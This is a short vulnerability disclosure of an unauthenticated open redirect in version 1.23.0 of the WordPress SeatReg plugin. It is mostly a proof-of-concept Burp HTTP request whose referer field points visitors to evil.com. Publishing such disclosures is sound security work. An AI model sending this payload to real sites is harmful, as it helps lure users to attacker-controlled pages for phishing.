WordPress SeatReg plugin version 1.23.0 suffers from an open redirection vulnerability.
3f4e275f4cee8c979ba6b8080600098951d861c79cc78158cb4597779c782465# Exploit Title: WordPress Plugin ‘SeatReg’ - Unauthenticated Open
Redirect
# Date: 01-08-2022
# Exploit Author: Mariam Tariq - HunterSherlock
# Vendor Homepage: https://wordpress.org/plugins/seatreg/
# Version: 1.23.0
# Tested on: Firefox
# Contact me: [email protected]
*#Description:*
An Open Redirection is a vulnerability when a web application or server
uses an unvalidated user-submitted link to redirect the user to a given
website or page.
*#Example of Burp Request *
```
POST /wp-admin/admin-post.php HTTP/1.1
Host: website.com
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:103.0)
Gecko/20100101 Firefox/103.0
Accept:
text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: https://website.com
Content-Type: application/x-www-form-urlencoded
Content-Length: 185
Origin: https://website.com
Connection: close
Cookie: {cookies_here}
Upgrade-Insecure-Requests: 1
Sec-Fetch-Dest: document
Sec-Fetch-Mode: Navigate
Sec-Fetch-Site: same-origin
new-registration-name=dedeed&action=seatreg_create_submit&seatreg-admin-nonce=11b1308e8a&*_wp_http_referer=https://evil.com
<https://evil.com>*&submit=Create+new+registration
```
*#PoC Image:*
https://ibb.co/tCZWH0H
https://ibb.co/5kh299z